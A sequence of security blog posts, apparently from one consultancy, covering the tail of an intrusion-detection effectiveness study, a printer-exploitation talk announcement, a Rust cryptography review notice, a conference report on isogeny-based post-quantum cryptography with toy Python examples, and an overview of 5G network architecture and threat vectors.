The figure below shows the age of rules plotted against the number of incidents that a rule of that age triggers on average per week. For instance, the spike on the left represents rules that are a week old. Such a week-old rule would, on average, produce around four incidents per week. This means that it’s the newest rules that produce the most incidents. The implications of this are twofold. Firstly, it emphasizes the importance of staying up to date with the global threat landscape. It is insufficient to rely on rules and rulesets that perfectly protected your organization once upon a time. SOC teams need to continuously scour for new threats and perform their own research to keep their organization and their clients secure. And secondly, rules seem to lose their relevance and effectiveness as time goes by. Probably obvious, yes, but it hints at the possibility of another type of NIDS optimization, one aimed at performance. While disabling any and all rules that pass a certain age threshold might not be the wisest of decisions, SOC teams can examine old rules to determine which ones produce results that are less than satisfactory. Such rules can then potentially be disabled, depending, of course, on the type of rule, severity of the threat it is designed to detect, its precision (or any other metric), etc.

99.8% of (detected) true positive incidents caught before becoming successful attacks

Finally, the image below is a visual representation of all the alerts we analyzed, and how they are condensed into incidents, true positive incidents, and successful attacks. For the 13 years of data made available for this analysis, we counted 62 million alerts that our SOC analysts processed. They were able to condense the 62 million alerts into 150,000 incidents. These 150,000 incidents were in turn narrowed down to 69,000 true positive incidents. And finally, out of the 69,000, only 106 turned out to be successful attacks. With some quick math we can deduce that 99.8% of all true positive incidents detected by the SOC were discovered before they were able to cause any serious damage to the organizations that the SOC protects on a daily basis. I’ll point out, though, that this number obviously ignores the potential false negatives that were able to evade detection. This is, naturally, a number that we can’t easily measure accurately. However, we’re certain it doesn’t run high enough to significantly alter the result, and so, we’re confident in the accuracy of the computed percentage.
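The quick math behind the 99.8% figure can be reproduced from the rounded counts quoted above. A minimal Python sketch, with hypothetical variable names:

```python
# Rounded counts as quoted in the text.
ALERTS = 62_000_000
INCIDENTS = 150_000
TRUE_POSITIVE_INCIDENTS = 69_000
SUCCESSFUL_ATTACKS = 106


def share_caught_in_time(true_positives, successful_attacks):
    """Fraction of true positive incidents that did not become successful attacks."""
    return 1 - successful_attacks / true_positives


if __name__ == "__main__":
    caught = share_caught_in_time(TRUE_POSITIVE_INCIDENTS, SUCCESSFUL_ATTACKS)
    print(f"caught before success: {caught:.1%}")
    print(f"alerts per incident:   {ALERTS / INCIDENTS:.0f}")
    print(f"true positive share:   {TRUE_POSITIVE_INCIDENTS / INCIDENTS:.0%}")
```

The same counts also show the scale of the triage work: on the order of several hundred alerts per incident, with a little under half of all incidents turning out to be true positives.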

Conclusion

So, with all of these results, we demonstrate that signature-based systems are still effective, provided that they are managed properly, for example, by keeping them up to date with the newest threat intelligence. Of course, future work is still needed to compare the signature-based approach to other types of intrusion detection approaches, whether they’re other network-based, host-based or application-based approaches. Only once that comparison is done will we be able to determine whether these signature-based systems really do need to be phased out as archaic and obsolete pieces of technology or if they remain an indispensable part of our network security. As it currently stands, however, the fact that they continue to provide value and security to the organizations that use them is indisputable.

This was a quick overview of a few findings from our study. If you’re curious for more, you’re welcome to take a look at the full paper (https://dl.acm.org/doi/abs/10.1145/3488932.3517412).

References

[1] http://web.archive.org/web/20201209162847/https://bricata.com/blog/ids-is-dead/

[2] Shone, N., Ngoc, T.N., Phai, V.D. and Shi, Q., 2018. A deep learning approach to network intrusion detection. IEEE transactions on emerging topics in computational intelligence, 2(1), pp.41-50.

[3] Vigna, G., 2010, December. Network intrusion detection: dead or alive?. In Proceedings of the 26th Annual Computer Security Applications Conference (pp. 117-126).

[4] Mirsky, Y., Doitshman, T., Elovici, Y. and Shabtai, A., 2018. Kitsune: an ensemble of autoencoders for online network intrusion detection. arXiv preprint arXiv:1802.09089.

[5] He, H. and Garcia, E.A., 2009. Learning from imbalanced data. IEEE Transactions on knowledge and data engineering, 21(9), pp.1263-1284.

HITB Phuket 2023 – Exploiting the Lexmark PostScript Stack

Aaron Adams presented this talk at HITB Phuket on the 24th August 2023. The talk
detailed how NCC Exploit Development Group (EDG) in Pwn2Own 2022 Toronto was
able to exploit two different PostScript vulnerabilities in Lexmark printers.
The presentation is a good primer for those interested in further researching
the Lexmark PostScript stack, and also those interested in how PostScript
interpreter exploitation can be approached in general.

The slides for the talk can be downloaded here.

Public Report – Entropy/Rust Cryptography Review

During the summer of 2023, Entropy Cryptography Inc engaged NCC Group’s Cryptography Services team to perform a cryptography and implementation review of several Rust-based libraries implementing constant-time big integer arithmetic, prime generation, and secp256k1 (k256) elliptic curve functionality. Two consultants performed the review within 40 person-days of effort, which included retesting and report generation.

The three primary code repositories in scope for this review were:

  1. github.com/RustCrypto/crypto-bigint
  2. github.com/entropyxyz/crypto-primes
  3. github.com/RustCrypto/elliptic-curves/k256.

The review identified a range of issues that were addressed promptly once reported, with the proposed fixes aligning with the recommendations made in the report below.

SIAM AG23: Algebraic Geometry with Friends

I recently returned from Eindhoven, where I had the pleasure of giving a talk on some recent progress in isogeny-based cryptography at the SIAM Conference on Applied Algebraic Geometry (SIAM AG23). Firstly, I want to thank Tanja Lange, Krijn Reijnders and Monika Trimoska, who organised the mini-symposium on the application of isogenies in cryptography, as well as the other speakers and attendees who made the week such a vibrant space for learning and collaborating.

As an overview, the SIAM Conference on Applied Algebraic Geometry is a biennial event which aims to collect together researchers from academia and industry to discuss new progress in their respective fields, which all fall under the beautiful world of algebraic geometry. Considering the breadth of algebraic geometry, it is maybe not so surprising that the conference is then filled with an eclectic mix of work, with mini-symposia dedicated to biology, coding theory, cryptography, data science, digital imaging, machine learning and robotics (and much more!).

In the world of cryptography, algebraic geometry appears most prominently in public-key cryptography, both constructively and in cryptanalysis. Currently in cryptography, the most widely applied and studied objects from algebraic geometry are elliptic curves. The simple, but generic group structure of an elliptic curve together with efficient arithmetic from particular curve models has made it the gold standard for Diffie-Hellman key exchanges and the protocols built on top of this. More recently, progress in the implementation of bilinear pairings on elliptic curves has given a new research direction for building protocols. For an overview of pairing-based cryptography, I have a blog post discussing how we estimate the security of these schemes, and my colleague Eric Schorn has a series of posts looking at the implementation of pairing-based cryptography in Haskell and Rust.

Despite the success of elliptic curve cryptography, Shor’s quantum polynomial time algorithm to solve the discrete logarithm problem in abelian groups means a working, “large-enough”, quantum computer threatens to break most of the protocols which underpin modern cryptography. This devastating attack has led to the search for efficient, quantum-safe cryptography to replace the algorithms currently in use. Mathematicians and cryptographers have been searching for new cryptographically hard problems and building protocols from these, and algebraic geometry has again been a gold mine for new ideas. Our group effort since Shor’s paper in 1995 has led to exciting progress in areas such as multivariate, code-based, and my personal favourite, isogeny-based cryptography.

The study of post-quantum cryptography was the focus of many of the cryptographic talks over the course of the week, although the context and presentation of these problems was still very diverse. Zooming out, SIAM collectively organised 128+ sessions and 10 plenary talks; a full list of the program is available online. With a diverse group of people and a wide range of topics, the idea was not to attend everything (this is physically impossible for those who cannot split themselves into ~fourteen sentient pieces), but rather pick our own adventure from the program.

For the cryptographers who visited Eindhoven, there were three main symposia, which ran through the week without collisions:

  • Applications of Algebraic Geometry to Post-Quantum Cryptology.
  • Elliptic Curves and Pairings in Cryptography.
  • Applications of Isogenies in Cryptography.

Additional cryptography talks were in the single session “Advances in Code-Based Signatures”, which ran concurrently with the pairing talks on the Wednesday.

For those interested in a short summary of many of the talks at SIAM, Luca De Feo wrote a blog post about his experience of the conference which is available on Elliptic News. As a complement to what has already been written, the aim of this blog post is to give a general impression of what people are thinking about and the research which is currently ongoing.

In particular, the goal of this post is to summarize and give context to two of the main research focuses in isogeny-based cryptography which were talked about during the week. On one side, there is a deluge of new protocols being put forward which study isogenies between abelian varieties, generalising away from dimension one isogenies between elliptic curves. On the other side, the isogeny-based digital signature algorithm, SQIsign, has recently been submitted to NIST’s call for new quantum-safe signatures. Many talks through the week focused on algorithmic and parameter improvements to aid in the submission process.

What is an isogeny?

For those less familiar with isogenies, a very rough way to start thinking about isogeny-based cryptography can be understood as long as you have a good idea of how it feels to get lost, even when you know where you’re supposed to be going. Essentially, you can take a twisting and turning walk by using an “isogeny” to step from one elliptic curve to another. If I tell you where I started and where I end up, it seems very difficult for someone else to determine exactly the path I took to get there. In this way, our cryptographic secret is our path and our public information is the final curve at the end of this long walk.

Not only does this problem seem difficult, it also seems equally difficult for both classical and quantum computers, which makes it an ideal candidate for the building block of new protocols which aim to be quantum-safe. For some more context on the search for protocols in a “post-quantum” world, Thomas Pornin wrote an overview at the closing of round three of the NIST post-quantum project which ended about a year ago at the time of writing.

A little more specifically, for those interested, an isogeny is a special map which respects both the geometric idea of elliptic curves (it maps some projective curve to another), but also the algebraic group structure which cryptographers hold so dear (mapping the sum of points is the same as the sum of the individually mapped points). Concretely, an isogeny is some (non-constant) rational map which maps the identity on one curve to the identity of another.
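For readers who prefer symbols, the two properties above can be written out as follows. This is only a sketch of the standard definition: the names $\varphi$, $E$, $E'$ and the notation $\mathcal{O}$ for the identity point are my own choice of notation here.

```latex
\varphi : E \to E', \qquad
\varphi(\mathcal{O}_E) = \mathcal{O}_{E'}, \qquad
\varphi(P + Q) = \varphi(P) + \varphi(Q) \quad \text{for all } P, Q \in E.
```

The last identity is the “sum of points” statement. For a non-constant rational map between elliptic curves it follows automatically once the identity is sent to the identity.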

Isogenies in Higher Dimensions

For the past year, isogeny-based cryptography has undergone a revolution after a series of papers appeared which broke the key exchange protocol SIDH. The practical breakage of SIDH was particularly spectacular as it essentially removed the key-exchange mechanism, SIKE, from the NIST post-quantum project, which only weeks before had been chosen by NIST to continue to the fourth round as a prospective alternative candidate to Kyber.

For more information on the break of SIDH, I have a post on the SageMath implementation of the first attack, as well as a summary of the Eurocrypt 2023 conference, where the three attack papers were presented in the best-paper award plenary talks. Thomas Decru, one of the authors of the first attack paper, wrote a fantastic blog post which is a great overview of how the attack works.

The key to all of the attacks was that given some special data, information about the secret walk between elliptic curves could be recovered by computing an isogeny in “higher dimension”. In fact, the short description about isogenies was a little too restrictive. For the past ten years, cryptographers have been looking at how to compute isogenies between supersingular elliptic curves. However, over the fence in maths world, a generalisation of this idea is to look at isogenies between principally polarised superspecial abelian varieties. When we talk about these superspecial abelian varieties, a natural way to categorise them is by their “genus”, or “dimension”.

Luckily, for now, we don’t need to worry about arbitrary dimension, as for the current work we really only need dimension two for the attack on SIDH, and for some new proposed schemes, dimensions four and eight, which I won’t discuss much further.

If you want to imagine these higher dimensional varieties, one way is to think about three dimensional surfaces which have some “holes” or “handles”. A dimension one variety is an elliptic curve, which you can imagine as a donut. In dimension two we have two options, the generic object is some surface with two handles (a donut with two holes? Where’s all my donut gone?), but there are also “products of elliptic curves”, which can be seen as two dimensional surfaces which can in some sense be factored into two dimension-one surfaces (or abstractly, as a pair of donuts!).

The core computation of the attack is a two-dimensional isogeny between elliptic products. An isogeny between elliptic products is simply a walk which takes you from one of these pairs of donuts, through many many steps of the generic surface and ends on another special surface which factors into donuts again. A natural question to ask is, how special are these products? When we work in a finite field with characteristic p, we have about p^3 surfaces available and only p^2 of these are elliptic products. In cryptographic contexts, where the characteristic is usually very very large, it’s essentially impossible to accidentally land on one of these products.
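Taking the rough counts above at face value (about $p^3$ surfaces, of which about $p^2$ are elliptic products), the chance that a randomly chosen surface is a product can be estimated as below. The 256-bit size for $p$ is an illustrative assumption, not a parameter taken from any specific scheme.

```latex
\Pr[\text{random surface is an elliptic product}]
  \approx \frac{p^2}{p^3} = \frac{1}{p},
\qquad \text{so for } p \approx 2^{256} \text{ this is roughly } 2^{-256}.
```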

With this as background, we can now ask a few natural questions:

  • When can we compute isogenies between elliptic products?
  • Why do we want to compute isogenies between elliptic products?
  • How can we ask computers to compute isogenies between elliptic products?

Exactly when we find these very special isogenies between elliptic products was characterised in a lemma by Ernst Kani in 1997, and it was this lemma which illuminated the method to attack SIDH. Kani’s criterion describes how, when a set of one dimensional isogenies has particular properties, and when you additionally know certain information about the points on these curves, your specially chosen two dimensional isogeny will walk between elliptic products.

This is what Thomas Decru talked about in his presentation, which gave a wonderful overview of why these criteria were enough to successfully break SIDH. The idea is that although some of this information is secret, you can guess small parts of the secret and when you are correct, your two dimensional isogeny splits at the end. Guessing each part of the secret in turn then very quickly recovers the entire secret.

Following the description of the death of SIKE, Tako Boris Fouotsa talked about possible ways to modify the SIDH protocol to revive it. The general idea is to hide parts of the information Kani’s criterion requires in such a way that an attacker can no longer guess it piece by piece. One method is to take the information you need from the points on curves and mask it by multiplying them by some secret scalar.

Masking these points, which are the torsion data for the curves, was also the topic of two other talks. Guido Lido gave an energetic and enjoyable double-talk on the “level structure” of elliptic curves, which was complemented very nicely by a talk by Luca De Feo the following day which gave another perspective on how modular curves can help us complete the zoology of these torsion structures. Along with this categorisation, Luca gave a preview of a novel attack on one possible variant of SIDH which hides half of the torsion data. If SIDH is to be dragged back into protocols with the strategies discussed by Boris, it’s vital to really understand mathematically what this masking is, highlighting the importance of the work by Guido, Luca and their collaborators.

Although breaking a well-known and long-standing cryptographic protocol is more than enough motivation to study these isogenies, the continued research on computing higher dimensional isogenies will be motivated by the introduction of these maps into protocols themselves. This brings us to the why, and this was addressed by Benjamin Wesolowski, who discussed SQIsignHD, and Luciano Maino, who discussed FESTA. As SQIsign and related talks will soon have a section of their own, we’ll jump straight to FESTA.

The essence of FESTA is to find a way to configure some one dimensional isogenies during keygen and encryption such that during decryption, a holder of the secret key can perform the SIDH attack, while no one else can. As the SIDH attack describes secrets about the one dimensional isogenies, encryption is then a case of using some message to describe the isogeny path and as decryption recovers this path it also recovers the secret message. The core of how FESTA works is tied up in categories of masking, as Guido and Luca described. Luciano used his presentation to give an overview of how everything comes together, and how by using commutative masking matrices, encryption masks away certain critical data, and then during decryption the masking can be removed thanks to the commutativity.
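To make the role of commutativity a little more concrete, here is a deliberately tiny toy model in Python. It is not FESTA: the torsion data is replaced by a pair of integers modulo a power of two, the isogeny evaluations are left out entirely, and the masks are assumed to be invertible diagonal matrices (stored as pairs of odd integers). All names and values are hypothetical. The only point it illustrates is that when two masks commute, the holder of one mask can strip it off even after a second mask has been applied on top.

```python
# Toy model only: diagonal "masking matrices" acting on a pair of integers
# modulo N. Everything here is an illustrative assumption, not FESTA itself.
N = 2**8  # toy modulus; real torsion orders are far larger


def apply_mask(mask, vec):
    """Apply a diagonal matrix diag(mask[0], mask[1]) to a vector mod N."""
    return tuple((m * v) % N for m, v in zip(mask, vec))


def invert_mask(mask):
    """Invert a diagonal matrix mod N (entries must be odd, so invertible)."""
    return tuple(pow(m, -1, N) for m in mask)


secret_key_mask = (3, 5)    # hypothetical mask known only to the key holder
encryption_mask = (7, 11)   # hypothetical mask chosen by the sender
torsion_data = (9, 20)      # stand-in for the unmasked torsion information

# Key generation masks first, encryption masks second.
published = apply_mask(secret_key_mask, torsion_data)
ciphertext = apply_mask(encryption_mask, published)

# Diagonal matrices commute, so the key holder can remove their own mask
# even though it was applied before the sender's mask.
unmasked = apply_mask(invert_mask(secret_key_mask), ciphertext)
```

After running this, `unmasked` equals `apply_mask(encryption_mask, torsion_data)`: the key holder sees the data masked only by the sender, which is the shape of information the decryption step then works from.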

The idea of using SIDH attacks to build a quantum-safe public key encryption protocol is not new. In SETA, a very similar protocol was described. However, due to the inefficiencies of the SIDH attacks at the time, the protocol itself did not have practical running times. The key to what makes FESTA efficient is precisely the new polynomial time algorithms for the attack.

To close out the third session of the isogeny mini-symposium, I then did my best to try and talk about the how. Given the motivation that these isogenies can be used constructively to build quantum-safe protocols, can we find ways to strip back the complications in existing implementations and get something efficient and simple enough that it appears suitable for cryptographic protocols? The talk was split between the three categories of isogenies we need:

  • The first step is understanding how to compute the “gluing isogeny”, between a product of elliptic curves and the resulting dimension-two surface.
  • The last step is understanding how to efficiently compute the “splitting isogeny” from a two-dimensional surface to a pair of elliptic curves.
  • All other steps are then isogenies between these generic two dimensional surfaces. These are described by the Richelot correspondence, which dates back to the 19th century and is surprisingly simple considering the work it does.

I described some new results which allow for particularly efficient gluing isogenies, and that working algebraically, a closed form of the splitting isogeny can be recovered, saving about 90% of the work of the usual methods. For the middle steps, there’s still much work to be done and I hope as a community we can continue optimising these isogenies.

In summary, the SIDH attacks have introduced a whole new toolbox of isogenies and it’s exciting to see these being used constructively and optimised for real-world usage. The cryptanalysis of isogeny-based protocols of course has its own revolution, and understanding how higher dimensional structures can make or break new schemes is vibrant and exciting work.

An Isogeny Walk back to NIST

Back in dimension one, an isogeny-based digital signature algorithm has been submitted to NIST’s recent call for protocols. Of the 40 candidates which appeared with round one coming online, only one is isogeny-based. SQIsign is an extremely compact, but relatively new and slow protocol which was introduced in 2020 and was followed up with a paper with various performance enhancements in 2022.

Underlying SQIsign is a fairly simple idea. The signer computes a secret isogeny path between two elliptic curves. The starting curve, which is public and known to everyone, has special properties. The signer publishes their ending curve as a public key, but as only they know the isogeny between the curves, only the signer knows special properties of the ending curve. A signature is computed from a high-soundness sigma protocol, which essentially boils down to asking the signer to compute something which they could only know if they know this secret isogeny.

Concretely, SQIsign is built on the knowledge of the endomorphism ring of an elliptic curve, which is the set of isogenies from a curve to itself. The starting curve is chosen so everyone knows its endomorphism ring. The trick in SQIsign is that although generally it seems hard to compute the endomorphism ring of a random supersingular curve, if you know an isogeny between two curves and the endomorphism ring of one of them, you can efficiently compute the endomorphism ring of the other. This means that the secret isogeny allows the signer to “transport” the endomorphism ring from the starting curve to their public curve thanks to their secret isogeny and so the endomorphism ring of this end curve is secret to everyone except the signer.

Algorithms become efficient thanks to the Deuring correspondence, which takes information from an elliptic curve and represents it using a quaternion algebra. In quaternion world, certain problems become easy which are hard on elliptic curves, and once the right information is recovered, the Deuring correspondence maps this all back to elliptic curve world so the protocol can continue. Ultimately all of the above boils down to “things are computationally easy if you know the endomorphism ring”. Because of this, a signer can compute things from the public curve which nobody else can feasibly do.

There are a lot of buzzwords in the above, and unpicking exactly how SQIsign works is challenging. For the interested reader, I recommend the above papers, along with Antonin Leroux’s thesis. For those who like to learn along with the implementation, I worked with some collaborators to write a verbose implementation following the first SQIsign paper in SageMath. A blog discussing implementation challenges was written: Learning to SQI and the code is on GitHub.

The selling point of SQIsign is its compact representation. For NIST level I security (128-bit), a public key requires only 64 bytes and a signature only 177 bytes. Compare this to Dilithium, a lattice-based scheme chosen at the end of round three, which at the same security level has public keys with 1312 bytes and signatures of 2420 bytes! However, the main drawback is that it’s orders of magnitude slower than Dilithium, and the complex, heuristic algorithms of some of the quaternion algebra pieces mean that writing a safe and side-channel resistant implementation is extremely challenging.
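To put the size gap in one number, the short Python sketch below adds up the public key and signature sizes quoted above and compares the two schemes. The byte counts are exactly those given in the text; the dictionary layout and function names are just my own illustration.

```python
# Sizes in bytes at NIST level I, as quoted in the paragraph above.
SIZES = {
    "SQIsign": {"public_key": 64, "signature": 177},
    "Dilithium": {"public_key": 1312, "signature": 2420},
}


def combined_size(scheme):
    """Bytes needed to transmit one public key plus one signature."""
    entry = SIZES[scheme]
    return entry["public_key"] + entry["signature"]


def size_ratio(larger, smaller):
    """How many times bigger `larger` is than `smaller` (key + signature)."""
    return combined_size(larger) / combined_size(smaller)


if __name__ == "__main__":
    for name in SIZES:
        print(f"{name}: {combined_size(name)} bytes")
    print(f"ratio: {size_ratio('Dilithium', 'SQIsign'):.1f}x")
```

A public key and signature together come to 241 bytes for SQIsign against 3732 bytes for Dilithium, so a little over fifteen times smaller on the wire.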

At SIAM, progress in closing the efficiency gap was the subject of several talks, and optimisations are being found in a variety of ways. Lorenz Panny discussed the Deuring correspondence in a more general setting, where he showed that with some clever algorithmic tricks, isogenies could be computed in reasonable time by using extension fields to gather enough data for the Deuring correspondence to be feasible, even for inefficient parameter sets.

On the flip side of this, Michael Meyer discussed recent advances in parameter searching for SQIsign, which makes the work that Lorenz described particularly efficient. One of the main bottlenecks in SQIsign is in computing large prime degree isogenies, which occurs because SQIsign requires a characteristic p such that both p+1 and p-1 have many small factors, and for large p, it’s tough to ensure all these factors stay as small as possible. Michael discussed several different tricks which can be used to find twin smooth numbers and how different techniques are beneficial depending on the bit-length of p. The upshot is that the culmination of all the ideas has allowed the SQIsign team to find valid parameter sets targeting all three NIST security levels.
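As a toy illustration of the search problem, the Python sketch below brute-forces small primes p for which both p-1 and p+1 are smooth, meaning all of their prime factors are at most some bound. This is emphatically not how the SQIsign parameters are found: real searches work with primes of hundreds of bits and use much cleverer constructions than trial division. The function names and the bounds are my own assumptions for the example.

```python
def largest_prime_factor(n):
    """Largest prime factor of n >= 2 by trial division (toy sizes only)."""
    largest = 1
    d = 2
    while d * d <= n:
        while n % d == 0:
            largest = d
            n //= d
        d += 1
    if n > 1:
        # Whatever is left after dividing out small factors is itself prime.
        largest = n
    return largest


def is_prime(n):
    return n >= 2 and largest_prime_factor(n) == n


def is_smooth(n, bound):
    """True when every prime factor of n is at most `bound`."""
    return largest_prime_factor(n) <= bound


def primes_with_smooth_neighbours(limit, bound):
    """Primes 5 <= p < limit such that p - 1 and p + 1 are both bound-smooth."""
    return [
        p
        for p in range(5, limit)
        if is_prime(p) and is_smooth(p - 1, bound) and is_smooth(p + 1, bound)
    ]


if __name__ == "__main__":
    print(primes_with_smooth_neighbours(100, 5))
```

Below 100 with a smoothness bound of 5 this prints [5, 7, 11, 17, 19, 31], and already nothing qualifies between 31 and 100. That thinning out is the difficulty in miniature: as p grows, primes with both neighbours smooth become rare very quickly.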

Antonin Leroux talked more specifically about the Deuring correspondence as used in the context of SQIsign and focused on the improvements between the 2020 and 2022 SQIsign papers. The takeaway was that several improvements have resulted in performance enhancements to allow up to NIST-V parameter sets, but the protocol was a long way off competing with the lattice protocols which had already been picked. Optimistically, we can always work hard to find faster ways to do mathematics, and the compact keys and signatures of SQIsign make it extremely attractive for certain use cases.

To finish the summary, we can come back to Benjamin Wesolowski’s talk, which described recent research which adopts the progress in higher dimensions and modifies the SQIsign protocol, removing many heuristic and complicated steps during keygen and signing and shifts the protocol’s complexity into verification.

The main selling point of SQIsignHD is that it is not only simpler to implement in many ways, but the security proofs become much more straightforward, which should go a long way to show that the protocol is robust. However, unlike the original SQIsign, SQIsignHD verification requires the computation of a four dimensional isogeny. These isogenies are theoretically described, but a full implementation of these is still a work in progress. Understanding precisely how the verification time is affected is key to understanding whether the HD-remake of SQIsign could either replace or exist alongside the original description.

Acknowledgements

Many thanks to Aleksander Kircanski for reading an earlier draft of this blog post, and to all the people I worked with during the week in Eindhoven.

5G security – how to minimise the threats to a 5G network

To ensure security of new 5G telecom networks, NCC Group has been providing guidance, conducting code reviews, red team engagements and pentesting 5G standalone and non-standalone networks since 2019. As with any network, various attackers are motivated by different reasons. An attacker could be motivated to either gain information about subscribers on an operator’s network by targeting signalling, accessing the customers’ private data such as billing records, taking control over the management network or taking down the network. In most cases, the main avenue of attack is via the management layer into the core network – either utilising the operator’s support personnel or via the 3rd party vendor. In all cases attacking a 5G network will take a number of weeks or months, with the main group of attackers being Advanced Persistent Threat (APT) groups. Many governments around the world, including the UK government, are legislating and demanding operators and vendors reduce telecoms security gaps to ensure a resilient 5G network.

But many operators are unclear on the typical threats and how they could affect their business or if they do at all. Many companies are understandably investing significant time and effort into testing and reviewing threats to make sure they adhere to the compliance requirements.

Here, we aim to cover some of the main issues we have discovered during our pentesting and consultancy engagements with clients and explain not only what they are but how likely the threat is to disrupt the 5G network.

Background

Any typical 5G network deployment, be it a Non Standalone (NSA) or Standalone (SA) core, can have various security threats or risks associated with it. These threats can be exploited by either known (e.g. default credentials) or unknown vulnerabilities (e.g. zero day). Primarily the main focus of any attack is via the existing core management network, be it via a malicious insider or an attacker who has leveraged access to a suitably high level administrator account or utilising default credentials. We have seen this first hand with red teaming attacks against various operators. Secondary attack vectors are via insecure remote sites hosting RAN infrastructure, which in turn allow access to the core network utilising the management network. Various mechanisms (e.g. firewalls, IDS) are put in place to manage these risks but vulnerable networks and systems have to be tested thoroughly to limit attacks. Having a good understanding of the 5G network topology and associated risks/threats is key and NCC Group has the necessary experience and knowledge to scope and deliver this testing.

Typical perceived threats and severity if compromised are illustrated below. The high risk vector is via the corporate and vendor estate, medium risk vectors via the external internet and rogue operators and low risk vector via the RAN edge nodes. This factors in ease of access plus the degree of severity should an attacker leverage access. For example, if an attacker was to gain access to the corporate network and suitable credentials to access the cloud network equipment running the 5G network, that would have a high level impact if a DoS attack was conducted. This is opposed to an attacker leveraging access to a RAN edge node to conduct a DoS attack, where the exposed risks would be limited to the cell site in question.

“Attack scenarios against a typical 4G/5G mobile network”

So a bit of background on 5G. A 5G NSA network consists of a 5G OpenRAN deployment or a gNodeB utilising a 4G LTE core. A 5G StandAlone (SA) network consists of a 5G RAN (Radio Access Network) plus a 5G core only. Within an NSA deployment, a secondary 5G carrier is provided in addition to the primary 4G carrier. A 5G NSA user equipment (UE) device connects first to the 4G carrier before also connecting to the secondary 5G carrier. The 4G anchor carrier is used for control plane signalling while the 5G carrier is used for high-speed data plane traffic. This approach has been used for the majority of commercial 5G network deployments to date. It provides improved data rates while leveraging existing 4G infrastructure. The main benefits of 5G NSA are that an operator can build out a 5G network on top of their existing 4G infrastructure instead of investing in a new, costly 5G core, that the NSA network uses 4G infrastructure which operators are already familiar with, and that deployment of a 5G network can be quicker by using the existing infrastructure.

A 5G SA network helps reduce latency, improves network performance and has centrally controlled network management functions. The 5G SA can deliver new essential 5G services such as network slicing, allowing multiple tenants or networks to exist separate from each other on the same physical infrastructure. While services like smart meters, which require security, low power and high reliability, are more forgiving with respect to latency, others like driverless cars may need ultra-reliable low-latency communication (URLLC) and high data speeds. Network slicing in 5G supports these diverse services and facilitates the efficient reassignment of resources from one virtual network slice to another. However, the main disadvantage of implementing a 5G SA network is the cost of implementation and of training staff to learn and correctly configure all parts of the new 5G SA core infrastructure.

An OpenRAN network allows deployment of a Radio Access Network (RAN) with vendor neutral hardware or software. The components (e.g. RU/DU/CU) are linked using open interface specifications, with different architecture options available. A Radio Unit (RU) is used to handle the radio link and antenna connectivity, while a Distributed Unit (DU) is used to handle the baseband protocols and interconnections to the Centralised Unit (CU). The architecture options include a RAN with just Radio Units (RU) and Base Band Units (BBU), or a split between RU, DU and CU. Normally the Radio Unit is a physical amplifier device connected over a fibre or coaxial link to a DU component that is normally virtualised. A CU component is normally located back in a secure datacentre or exchange and provides the eNodeB/gNodeB connectivity into the core. In most engagements we have seen the use of Kubernetes running DU/CU pods as Docker containers on primarily Dell hardware, with a software defined network layer linking into the 5G core.

In 5G a user identity (i.e. IMSI) is never sent over the air in the clear. On the RAN/edge datacentre the control and user planes are encrypted over the air and on the wire (e.g. IPsec), with the 5G core utilising encrypted and authenticated signalling traffic. The 5G network components have externally and internally exposed HTTP/2 Service Based Interface (SBI) APIs and provide access directly to the 5G core components for management, logging and monitoring. Usually the SBI interface is secured using TLS client and server certificates. The network can now support different tenants by implementing network slices, with the Software Defined Networking (SDN) layer isolating network domains for different users.
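As a rough illustration of what “TLS client and server certificates” means on the server side of such an interface, the following Python sketch builds a TLS context that refuses clients which do not present a certificate. It uses only the standard library `ssl` module. The function name, the file path parameters and the choice of TLS 1.2 as the minimum version are assumptions made for the example, not settings taken from any particular 5G core product.

```python
import ssl


def make_sbi_server_context(certfile=None, keyfile=None, cafile=None):
    """Build a server-side TLS context that demands a client certificate.

    The three file paths are hypothetical placeholders; when omitted, the
    context is still configured but has no key material loaded.
    """
    # Purpose.CLIENT_AUTH gives a context suitable for a server socket.
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # assumed policy choice
    # Mutual TLS: the handshake fails unless the client presents a
    # certificate that chains to a CA we trust.
    ctx.verify_mode = ssl.CERT_REQUIRED
    # Service based interfaces speak HTTP/2, negotiated via ALPN.
    ctx.set_alpn_protocols(["h2"])
    if cafile is not None:
        ctx.load_verify_locations(cafile=cafile)  # CA that signs client certs
    if certfile is not None:
        ctx.load_cert_chain(certfile=certfile, keyfile=keyfile)
    return ctx


sbi_context = make_sbi_server_context()
```

The important line is `verify_mode = ssl.CERT_REQUIRED`. With the default for server contexts (`ssl.CERT_NONE`) only the server is authenticated, and any client that can reach the port can query the API.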

So what are the main security threats?

Shown below is a high level overview of a 5G network with a summary of threats. A radio unit front end containing the gNodeB (i.e. basestation) handles interconnects to the user equipment (UE). A RU/DU/CU together form the gNodeB. The Distributed Unit (DU) handles the baseband layer, connecting to the RU over the fronthaul and to the Centralised Unit (CU) over the midhaul. The DU does not have any access to customer communications as it may be deployed in unsupervised sites. The CU and Non-3GPP Inter Working Function (N3IWF), which terminates the Access Stratum (AS) security, will be deployed in sites with more restricted access. The DU and CU components can be collocated or separate, usually running as virtualised components within a cluster on standard servers. To support low latency applications, Multi-Access Edge Computing (MEC) servers are now being developed to reduce network congestion and application latency to users by pushing the computing resources, including storage, to the edge of the network, collocating them with the front RF equipment. The MEC offers application developers and content providers cloud computing capabilities and an IT service environment at the edge of the external data network to provide processing capacity for high demand streaming applications like virtual reality games as well as low latency processing for driverless cars. All links are connected over Nx links. The main threats against the DU/CU/MEC components are physical attacks against the infrastructure, either to cause damage (e.g. arson) or to compromise the operating system to glean information about users on the RAN signalling plane. In some cases, attacking the core via these components by compromising management platforms is also possible. Targeting the MEC via a poorly configured CI/CD pipeline and the ingest of malicious code could also be a threat.

